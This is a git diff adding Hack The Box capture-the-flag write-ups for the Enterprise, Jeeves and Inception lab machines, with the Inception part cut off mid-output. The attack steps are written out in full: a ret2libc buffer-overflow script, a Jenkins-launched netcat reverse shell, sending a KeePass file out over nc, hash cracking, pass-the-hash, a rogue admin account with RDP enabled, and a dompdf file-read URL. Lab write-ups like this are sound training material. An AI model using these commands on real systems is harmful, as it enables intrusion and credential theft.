+ AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%yA%zAs%AssAsBAs$AsnAsCAs-As(AsDAs;As)AsEAsaAs0AsFAsbAs1AsGAscAs2AsHAsdAs3AsIAseAs4AsJAsfAs5AsKAsgAs6A
+
+ Program received signal SIGSEGV, Segmentation fault.
+ [----------------------------------registers-----------------------------------]
+ EAX: 0x216
+ EBX: 0x73254125 ('%A%s')
+ ECX: 0x7ffffde9
+ EDX: 0xf7fab010 --> 0x0
+ ESI: 0xf7fa9000 --> 0x1d6d6c
+ EDI: 0xf7fa9000 --> 0x1d6d6c
+ EBP: 0x41422541 ('A%BA')
+ ESP: 0xffffd140 ("nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%yA%zAs%AssAsBAs$A"...)
+ EIP: 0x25412425 ('%$A%')
+ EFLAGS: 0x10286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)
+ [-------------------------------------code-------------------------------------]
+ Invalid $PC address: 0x25412425
+ [------------------------------------stack-------------------------------------]
+ 0000| 0xffffd140 ("nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%yA%zAs%AssAsBAs$A"...)
+ 0004| 0xffffd144 ("A%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%yA%zAs%AssAsBAs$AsnAs"...)
+ 0008| 0xffffd148 ("%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%yA%zAs%AssAsBAs$AsnAsCAs-"...)
+ 0012| 0xffffd14c ("DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%yA%zAs%AssAsBAs$AsnAsCAs-As(A"...)
+ 0016| 0xffffd150 ("A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%yA%zAs%AssAsBAs$AsnAsCAs-As(AsDAs"...)
+ 0020| 0xffffd154 ("%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%yA%zAs%AssAsBAs$AsnAsCAs-As(AsDAs;As)"...)
+ 0024| 0xffffd158 ("aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%yA%zAs%AssAsBAs$AsnAsCAs-As(AsDAs;As)AsEA"...)
+ 0028| 0xffffd15c ("A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%yA%zAs%AssAsBAs$AsnAsCAs-As(AsDAs;As)AsEAsaAs"...)
+ [------------------------------------------------------------------------------]
+ Legend: code, data, rodata, value
+ Stopped reason: SIGSEGV
+ 0x25412425 in ?? ()
+ gdb-peda$ pattern_offset 500
+ 500 not found in pattern buffer
+ gdb-peda$ pattern_offset
+ Error: missing argument
+ Search for offset of a value in cyclic pattern
+ Set "pattern" option for basic/extended pattern type
+ Usage:
+ pattern_offset value
+
+ gdb-peda$ pattern_offset %$A%
+ %$A% found at offset: 212
+
+
+
+Here we found the offset of our pattern (that was 500 chars) at 212. now we just need to find the addresses of system, +9999999 and sh in order to get our root shell using the following command within gdb : **find &system;,+9999999,"sh"** and once we're done we arrive at the following payload :
+
+
+ AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x60\xc0\xe4\xf7\xf0\xfa\xe3\xf7\xd5\xdd\xf6\xf7
+
+
+Which is basically 212 As, + system's memory address, + exit + /bin/sh. Another way of doing things is using a python script used to connect remotely to the machine, and directly execute the binary with the correct payload, which effectively gives us a root shell on the machine.
+
+
+ #!/usr/bin/env python2
+ import time
+ import struct
+ from pwn import *
+ from subprocess import *
+
+ DEBUG = False
+ RHOST = "10.10.10.61"
+ RPORT = 32812
+
+ def conv(num):
+ return struct.pack("<****I",num)
+
+ payload = "A" * 212
+ payload += conv(0xf7e4c060) # system()
+ payload += conv(0xf7e3faf0) # exit()
+ payload += conv(0xf7f6ddd5) # 'sh'
+
+ r = remote(RHOST, RPORT)
+ r.recvuntil("Enter Bridge Access Code: ")
+ r.sendline("picarda1")
+ r.recvuntil("Waiting for input: ")
+ r.sendline("4")
+ r.recvuntil("Enter Security Override:")
+ r.sendline(payload)
+ r.interactive()
+
+Save it locally, and then execute it :
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Enterprise]
+ → ./autopwn.py
+ zsh: permission denied: ./autopwn.py
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Enterprise]
+ → chmod +x autopwn.py
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Enterprise]
+ → ./autopwn.py
+ [+] Opening connection to 10.10.10.61 on port 32812: Done
+ [*] Switching to interactive mode
+
+ $ id
+ uid=0(root) gid=0(root) groups=0(root)
+ $ cat /root/root.txt
+ cfXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And that's it ! we have been able to print out the root flag.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
diff --git a/Medium/15.md b/Medium/15.md
new file mode 100644
index 0000000..c222927
--- /dev/null
+++ b/Medium/15.md
@@ -0,0 +1,390 @@
+# Jeeves Writeup
+
+
+
+## Introduction :
+
+Jeeves is a medium windows box that was released back in November 2017.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~]
+ → nmap -F 10.10.10.63 --top-ports 10000
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-07 11:01 GMT
+ Nmap scan report for 10.10.10.63
+ Host is up (0.10s latency).
+ Not shown: 8316 filtered ports
+ PORT STATE SERVICE
+ 80/tcp open http
+ 135/tcp open msrpc
+ 445/tcp open microsoft-ds
+ 50000/tcp open ibm-db2
+
+ Nmap done: 1 IP address (1 host up) scanned in 27.37 seconds
+
+ λ nihilist [ 10.10.14.11/23 ] [~]
+ → nmap -sCV -p80,135,445,50000 10.10.10.63
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-07 11:01 GMT
+ Nmap scan report for 10.10.10.63
+ Host is up (0.11s latency).
+
+ PORT STATE SERVICE VERSION
+ 80/tcp open http Microsoft IIS httpd 10.0
+ | http-methods:
+ |_ Potentially risky methods: TRACE
+ |_http-server-header: Microsoft-IIS/10.0
+ |_http-title: Ask Jeeves
+ 135/tcp open msrpc Microsoft Windows RPC
+ 445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
+ 50000/tcp open http Jetty 9.4.z-SNAPSHOT
+ |_http-server-header: Jetty(9.4.z-SNAPSHOT)
+ |_http-title: Error 404 Not Found
+ Service Info: Host: JEEVES; OS: Windows; CPE: cpe:/o:microsoft:windows
+
+ Host script results:
+ |_clock-skew: mean: 4h01m38s, deviation: 0s, median: 4h01m37s
+ |_smb-os-discovery: ERROR: Script execution failed (use -d to debug)
+ | smb-security-mode:
+ | account_used: guest
+ | authentication_level: user
+ | challenge_response: supported
+ |_ message_signing: disabled (dangerous, but default)
+ | smb2-security-mode:
+ | 2.02:
+ |_ Message signing enabled but not required
+ | smb2-time:
+ | date: 2020-03-07T15:03:42
+ |_ start_date: 2020-03-06T19:38:44
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 48.29 seconds
+
+
+
+## **Part 2 : Getting User Access**
+
+our nmap scan picked up port 80 and 50000 running the http service so let's examine it with gobuster :
+
+ 
+
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~]
+ → gobuster dir -u http://10.10.10.63/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
+ ===============================================================
+ Gobuster v3.0.1
+ by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
+ ===============================================================
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~]
+ → gobuster dir -u http://10.10.10.63:50000/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50
+ ===============================================================
+ Gobuster v3.0.1
+ by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
+ ===============================================================
+ [+] Url: http://10.10.10.63:50000/
+ [+] Threads: 50
+ [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
+ [+] Status codes: 200,204,301,302,307,401,403
+ [+] User Agent: gobuster/3.0.1
+ [+] Timeout: 10s
+ ===============================================================
+ 2020/03/07 11:09:18 Starting gobuster
+ ===============================================================
+ /askjeeves (Status: 302)
+ ===============================================================
+ 2020/03/07 11:18:07 Finished
+ ===============================================================
+
+
+Gobuster didn't find many interesting apart from /askjeeves on port 50000 so let's check it out :
+
+
+
+Looking into script console we are able to get command execution :
+
+
+
+so let's try to upload a windows binary onto the machine using command execution and python's SimpleHTTPServer module :
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~]
+ → cd /usr/share/windows-binaries
+
+ λ nihilist [ 10.10.14.11/23 ] [/usr/share/windows-binaries]
+ → ls
+ enumplus fgdump klogger.exe nbtenum plink.exe vncviewer.exe whoami.exe
+ exe2bat.exe fport mbenum nc.exe radmin.exe wget.exe
+
+ λ nihilist [ 10.10.14.11/23 ] [/usr/share/windows-binaries]
+ → python -m SimpleHTTPServer 8080
+ Serving HTTP on 0.0.0.0 port 8080 ...
+
+
+On jenkins's script console run the following :
+
+
+ def process = "powershell -command Invoke-WebRequest 'http://10.10.14.11:8080/nc.exe' -OutFile nc.exe".execute();
+ println("${process.text}");
+
+
+Once the netcat binary is on the box, we use it to get ourselves a reverse shell :
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~]
+ → nc -lvnp 9001
+
+
+
+ def process = "powershell -command ./nc.exe 10.10.14.11 9001 -e cmd.exe".execute();
+ println("${process.text}");
+
+
+` 
+
+And we get a reverse shell ! now let's see what we can do from here :
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~]
+ → nc -lvnp 9001
+ listening on [any] 9001 ...
+ connect to [10.10.14.11] from (UNKNOWN) [10.10.10.63] 49688
+ Microsoft Windows [Version 10.0.10586]
+ (c) 2015 Microsoft Corporation. All rights reserved.
+
+ C:\Users\Administrator\.jenkins>whoami
+ whoami
+ jeeves\kohsuke
+
+ C:\Users\Administrator\.jenkins>cd ..
+ cd ..
+ Access is denied.
+
+
+Even though our reverse shell spawned us inside the administrator directory, we need to head over to our kohsuke directory
+
+
+ C:\Users\Administrator\.jenkins>cd C:\Users\kohsuke
+ cd C:\Users\kohsuke
+
+ C:\Users\kohsuke>dir
+ dir
+ Volume in drive C has no label.
+ Volume Serial Number is BE50-B1C9
+
+ Directory of C:\Users\kohsuke
+
+ 03/06/2020 11:44 PM <****DIR> .
+ 03/06/2020 11:44 PM <****DIR> ..
+ 11/03/2017 09:51 PM <****DIR> .groovy
+ 11/03/2017 10:15 PM <****DIR> Contacts
+ 11/03/2017 10:19 PM <****DIR> Desktop
+ 11/03/2017 10:18 PM <****DIR> Documents
+ 11/03/2017 10:15 PM <****DIR> Downloads
+ 03/04/2020 06:17 PM 1,230,604 epp
+ 11/03/2017 10:15 PM <****DIR> Favorites
+ 11/03/2017 10:22 PM <****DIR> Links
+ 03/06/2020 06:33 PM 136,192 ms16-032.exe
+ 11/03/2017 10:15 PM <****DIR> Music
+ 11/03/2017 10:22 PM <****DIR> OneDrive
+ 11/04/2017 02:10 AM <****DIR> Pictures
+ 11/03/2017 10:15 PM <****DIR> Saved Games
+ 11/03/2017 10:16 PM <****DIR> Searches
+ 11/03/2017 10:15 PM <****DIR> Videos
+ 2 File(s) 1,366,796 bytes
+ 15 Dir(s) 7,481,786,368 bytes free
+
+Once inside the documents folder, we see a kdbx password database, so let's send it over to our local machine:
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Jeeves]
+ → nc -lvnp 9002 > CEH.kdbx
+ listening on [any] 9002 ...
+
+
+
+ C:\Users\kohsuke\Documents>C:\Users\Administrator\.jenkins\nc.exe 10.10.14.11 9002 < CEH.kdbx
+
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Jeeves]
+ → nc -lvnp 9002 > CEH.kdbx
+ listening on [any] 9002 ...
+ connect to [10.10.14.11] from (UNKNOWN) [10.10.10.63] 49689
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Jeeves]
+ → file CEH.kdbx
+ CEH.kdbx: Keepass password database 2.x KDBX
+
+
+Now obviously we need to find the master password , to do so we can use keepass2john and rockyou.txt
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Jeeves]
+ → keepass2john CEH.kdbx
+ CEH:$keepass$*2*6000*0*1af405cc00f979ddb9bb387c4594fcea2fd01a6a0757c000e1873f3c71941d3d*3869fe357ff2d7db1555cc668d1d606b1dfaf02b9dba2621cbe9ecb63c7a4091*393c97beafd8a820db9142a6a94f03f6*b73766b61e656351c3aca0282f1617511031f0156089b6c5647de4671972fcff*cb409dbc0fa660fcffa4f1cc89f728b68254db431a21ec33298b612fe647db48
+
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Jeeves]
+ → keepass2john CEH.kdbx > hash.txt
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Jeeves]
+ → john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
+ Using default input encoding: UTF-8
+
+
+And we get the password moonshine1 , so let's use keepass to open it and see what the keepass database contains :
+
+ 
+
+so we'll use pth-winexe to get a shell connection to the machine using the hashed password we found :
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Jeeves]
+ → nano backup.pass
+
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Jeeves]
+ → pth-winexe --user=jeeves/administrator%aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 --system //10.10.10.63 cmd.exe
+ E_md4hash wrapper called.
+ HASH PASS: Substituting user supplied NTLM HASH...
+ Microsoft Windows [Version 10.0.10586]
+ (c) 2015 Microsoft Corporation. All rights reserved.
+
+ C:\Windows\system32>whoami
+ whoami
+ nt authority\system
+
+
+And here we see that we are logged in as nt authority\system
+
+
+
+ C:\Windows\system32>systeminfo
+ systeminfo
+
+ Host Name: JEEVES
+ OS Name: Microsoft Windows 10 Pro
+ OS Version: 10.0.10586 N/A Build 10586
+ OS Manufacturer: Microsoft Corporation
+ OS Configuration: Standalone Workstation
+ OS Build Type: Multiprocessor Free
+ Registered Owner: Windows User
+ Registered Organization:
+ Product ID: 00331-20304-47406-AA297
+ Original Install Date: 10/25/2017, 4:45:33 PM
+ System Boot Time: 3/6/2020, 2:38:22 PM
+ System Manufacturer: VMware, Inc.
+ System Model: VMware7,1
+ System Type: x64-based PC
+ Processor(s): 1 Processor(s) Installed.
+ [01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
+ BIOS Version: VMware, Inc. VMW71.00V.13989454.B64.1906190538, 6/19/2019
+ Windows Directory: C:\Windows
+ System Directory: C:\Windows\system32
+ Boot Device: \Device\HarddiskVolume1
+ System Locale: en-us;English (United States)
+ Input Locale: en-us;English (United States)
+ Time Zone: (UTC-05:00) Eastern Time (US & Canada)
+ Total Physical Memory: 2,047 MB
+ Available Physical Memory: 1,030 MB
+ Virtual Memory: Max Size: 2,687 MB
+ Virtual Memory: Available: 1,580 MB
+ Virtual Memory: In Use: 1,107 MB
+ Page File Location(s): C:\pagefile.sys
+ Domain: WORKGROUP
+ Logon Server: N/A
+ Hotfix(s): 10 Hotfix(s) Installed.
+ [01]: KB3150513
+ [02]: KB3161102
+ [03]: KB3172729
+ [04]: KB3173428
+ [05]: KB4021702
+ [06]: KB4022633
+ [07]: KB4033631
+ [08]: KB4035632
+ [09]: KB4051613
+ [10]: KB4041689
+ Network Card(s): 1 NIC(s) Installed.
+ [01]: Intel(R) 82574L Gigabit Network Connection
+ Connection Name: Ethernet0
+ DHCP Enabled: No
+ IP address(es)
+ [01]: 10.10.10.63
+ Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.
+
+
+
+Looking at systeminfo we see that we have a hotfixes are installed, so let's try and see if we can somehow vnc into the box, but first we need to first set up the vnc connection.
+
+
+ C:\Windows\system32>net user /add nihilist jeeved
+ net user /add nihilist jeeved
+ The command completed successfully.
+
+ C:\Windows\system32>net localgroup administrators nihilist /add
+
+ C:\Windows\system32>reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0
+ reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0
+ The operation completed successfully.
+
+ C:\Windows\system32>netsh firewall set service remoteadmin enable
+ netsh firewall set service remoteadmin enable
+
+ IMPORTANT: Command executed successfully.
+ However, "netsh firewall" is deprecated;
+ use "netsh advfirewall firewall" instead.
+ For more information on using "netsh advfirewall firewall" commands
+ instead of "netsh firewall", see KB article 947709
+ at http://go.microsoft.com/fwlink/?linkid=121488 .
+
+ Ok.
+
+
+ C:\Windows\system32>netsh firewall set service remotedesktop enable
+ netsh firewall set service remotedesktop enable
+
+ IMPORTANT: Command executed successfully.
+ However, "netsh firewall" is deprecated;
+ use "netsh advfirewall firewall" instead.
+ For more information on using "netsh advfirewall firewall" commands
+ instead of "netsh firewall", see KB article 947709
+ at http://go.microsoft.com/fwlink/?linkid=121488 .
+
+ Ok.
+
+
+
+Here we created the user nihilist, added him to the administrator localgroup, started the rdp service, allowed RDP connections for the firewall, from there we just need to use rdesktop to connect to the account we created.
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~]
+ → rdesktop 10.10.10.63
+
+
+`  
+
+Once we're connected, we head over to kohsuke's desktop to copy the user flag on our desktop, to be able to print it :
+
+
+
+## **Part 3 : Getting Root Access**
+
+However, we can do the same thing to the user account ! Going in the administrator desktop and copying the only textfile on our desktop allows us to be able to read it, and we see that it's not our root flag YET, so we'll follow the advice the textfile gave us :
+
+ 
+
+And that's it ! we have been able to print out the root flag.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
diff --git a/Medium/16.md b/Medium/16.md
new file mode 100644
index 0000000..5466a00
--- /dev/null
+++ b/Medium/16.md
@@ -0,0 +1,803 @@
+# Inception Writeup
+
+
+
+## Introduction :
+
+Inception is a Medium Linux box released back in December 2017.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~]
+ → nmap -F --top-ports 10000 10.10.10.67 -v
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-08 07:55 GMT
+ Initiating Ping Scan at 07:55
+ Scanning 10.10.10.67 [2 ports]
+ Completed Ping Scan at 07:55, 0.09s elapsed (1 total hosts)
+ Initiating Parallel DNS resolution of 1 host. at 07:55
+ Completed Parallel DNS resolution of 1 host. at 07:55, 0.03s elapsed
+ Initiating Connect Scan at 07:55
+ Scanning 10.10.10.67 [8320 ports]
+ Discovered open port 80/tcp on 10.10.10.67
+ Discovered open port 3128/tcp on 10.10.10.67
+ Completed Connect Scan at 07:56, 26.46s elapsed (8320 total ports)
+ Nmap scan report for 10.10.10.67
+ Host is up (0.091s latency).
+ Not shown: 8318 filtered ports
+ PORT STATE SERVICE
+ 80/tcp open http
+ 3128/tcp open squid-http
+
+ Read data files from: /usr/bin/../share/nmap
+ Nmap done: 1 IP address (1 host up) scanned in 26.68 seconds
+
+ λ nihilist [ 10.10.14.11/23 ] [~]
+ → nmap -sCV -p80,3128 10.10.10.67
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-08 07:56 GMT
+ Nmap scan report for 10.10.10.67
+ Host is up (0.094s latency).
+
+ PORT STATE SERVICE VERSION
+ 80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
+ |_http-server-header: Apache/2.4.18 (Ubuntu)
+ |_http-title: Inception
+ 3128/tcp open http-proxy Squid http proxy 3.5.12
+ |_http-server-header: squid/3.5.12
+ |_http-title: ERROR: The requested URL could not be retrieved
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 43.23 seconds
+
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan picked up port 80 running http so let's use gobuster to enumerate it :
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~]
+ → gobuster dir -w /usr/share/wordlists/dirb/big.txt -u http://10.10.10.67
+ ===============================================================
+ Gobuster v3.0.1
+ by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
+ ===============================================================
+ [+] Url: http://10.10.10.67
+ [+] Threads: 10
+ [+] Wordlist: /usr/share/wordlists/dirb/big.txt
+ [+] Status codes: 200,204,301,302,307,401,403
+ [+] User Agent: gobuster/3.0.1
+ [+] Timeout: 10s
+ ===============================================================
+ 2020/03/08 07:56:11 Starting gobuster
+ ===============================================================
+ /.htaccess (Status: 403)
+ /.htpasswd (Status: 403)
+ /assets (Status: 301)
+ /dompdf (Status: 301)
+ /images (Status: 301)
+ Progress: 10069 / 20470 (49.19%)^C
+
+
+` 
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~]
+ → curl -sk http://10.10.10.67/dompdf/VERSION
+ 0.6.0
+
+
+Now that we know about dompdf's version we run a quick searchsploit command to find publicly available exploits for us :
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~]
+ → searchsploit dompdf 0.6
+ ------------------------------------------------------- ------------------------------
+ Exploit Title | Path
+ | (/usr/share/exploitdb/)
+ ------------------------------------------------------- ------------------------------
+ dompdf 0.6.0 - 'dompdf.php?read' Arbitrary File Read | exploits/php/webapps/33004.txt
+ dompdf 0.6.0 beta1 - Remote File Inclusion | exploits/php/webapps/14851.txt
+ ------------------------------------------------------- ------------------------------
+ Shellcodes: No Result
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Inception]
+ → locate 33004.txt
+ /usr/share/exploitdb/exploits/php/webapps/33004.txt
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Inception]
+ → cp /usr/share/exploitdb/exploits/php/webapps/33004.txt .
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Inception]
+ → nano 33004.txt
+
+
+Looking at the exploit we seem to be able to get arbitrary file read on the dompdf.php file using a psecific string :
+
+
+ http://10.10.10.67/dompdf/dompdf.php?input_file=php://filter/read=convert.base64-encode/resource=/etc/passwd
+
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Inception]
+ → curl http://10.10.10.67/dompdf/dompdf.php\?input_file\=php://filter/read\=convert.base64-encode/resource\=/etc/passwd
+ %PDF-1.3
+ 1 0 obj
+ << /Type /Catalog
+ /Outlines 2 0 R
+ /Pages 3 0 R >>
+ endobj
+ 2 0 obj
+ << /Type /Outlines /Count 0 >>
+ endobj
+ 3 0 obj
+ << /Type /Pages
+ /Kids [6 0 R
+ ]
+ /Count 1
+ /Resources <<
+ /ProcSet 4 0 R
+ /Font <<
+ /F1 8 0 R
+ >>
+ >>
+ /MediaBox [0.000 0.000 612.000 792.000]
+ >>
+ endobj
+ 4 0 obj
+ [/PDF /Text ]
+ endobj
+ 5 0 obj
+ <<
+ /Creator (DOMPDF)
+ /CreationDate (D:20200308071455+00'00')
+ /ModDate (D:20200308071455+00'00')
+ >>
+ endobj
+ 6 0 obj
+ << /Type /Page
+ /Parent 3 0 R
+ /Contents 7 0 R
+ >>
+ endobj
+ 7 0 obj
+ <<
+ /Length 1894 >>
+ stream
+
+ 0.000 0.000 0.000 rg
+ BT 34.016 734.579 Td /F1 12.0 Tf [(cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaApkYWVtb246eDoxOjE6ZGFlbW9uOi91c3Ivc2JpbjovdXNyL3NiaW4vbm9sb2dpbgpiaW46eDoyOjI6YmluOi9iaW46L3Vzci9zYmluL25vbG9naW4Kc3lzOng6MzozOnN5czovZGV2Oi91c3Ivc2Jpbi9ub2xvZ2luCnN5bmM6eDo0OjY1NTM0OnN5bmM6L2JpbjovYmluL3N5bmMKZ2FtZXM6eDo1OjYwOmdhbWVzOi91c3IvZ2FtZXM6L3Vzci9zYmluL25vbG9naW4KbWFuOng6NjoxMjptYW46L3Zhci9jYWNoZS9tYW46L3Vzci9zYmluL25vbG9naW4KbHA6eDo3Ojc6bHA6L3Zhci9zcG9vbC9scGQ6L3Vzci9zYmluL25vbG9naW4KbWFpbDp4Ojg6ODptYWlsOi92YXIvbWFpbDovdXNyL3NiaW4vbm9sb2dpbgpuZXdzOng6OTo5Om5ld3M6L3Zhci9zcG9vbC9uZXdzOi91c3Ivc2Jpbi9ub2xvZ2luCnV1Y3A6eDoxMDoxMDp1dWNwOi92YXIvc3Bvb2wvdXVjcDovdXNyL3NiaW4vbm9sb2dpbgpwcm94eTp4OjEzOjEzOnByb3h5Oi9iaW46L3Vzci9zYmluL25vbG9naW4Kd3d3LWRhdGE6eDozMzozMzp3d3ctZGF0YTovdmFyL3d3dzovdXNyL3NiaW4vbm9sb2dpbgpiYWNrdXA6eDozNDozNDpiYWNrdXA6L3Zhci9iYWNrdXBzOi91c3Ivc2Jpbi9ub2xvZ2luCmxpc3Q6eDozODozODpNYWlsaW5nIExpc3QgTWFuYWdlcjovdmFyL2xpc3Q6L3Vzci9zYmluL25vbG9naW4KaXJjOng6Mzk6Mzk6aXJjZDovdmFyL3J1bi9pcmNkOi91c3Ivc2Jpbi9ub2xvZ2luCmduYXRzOng6NDE6NDE6R25hdHMgQnVnLVJlcG9ydGluZyBTeXN0ZW0gKGFkbWluKTovdmFyL2xpYi9nbmF0czovdXNyL3NiaW4vbm9sb2dpbgpub2JvZHk6eDo2NTUzNDo2NTUzNDpub2JvZHk6L25vbmV4aXN0ZW50Oi91c3Ivc2Jpbi9ub2xvZ2luCnN5c3RlbWQtdGltZXN5bmM6eDoxMDA6MTAyOnN5c3RlbWQgVGltZSBTeW5jaHJvbml6YXRpb24sLCw6L3J1bi9zeXN0ZW1kOi9iaW4vZmFsc2UKc3lzdGVtZC1uZXR3b3JrOng6MTAxOjEwMzpzeXN0ZW1kIE5ldHdvcmsgTWFuYWdlbWVudCwsLDovcnVuL3N5c3RlbWQvbmV0aWY6L2Jpbi9mYWxzZQpzeXN0ZW1kLXJlc29sdmU6eDoxMDI6MTA0OnN5c3RlbWQgUmVzb2x2ZX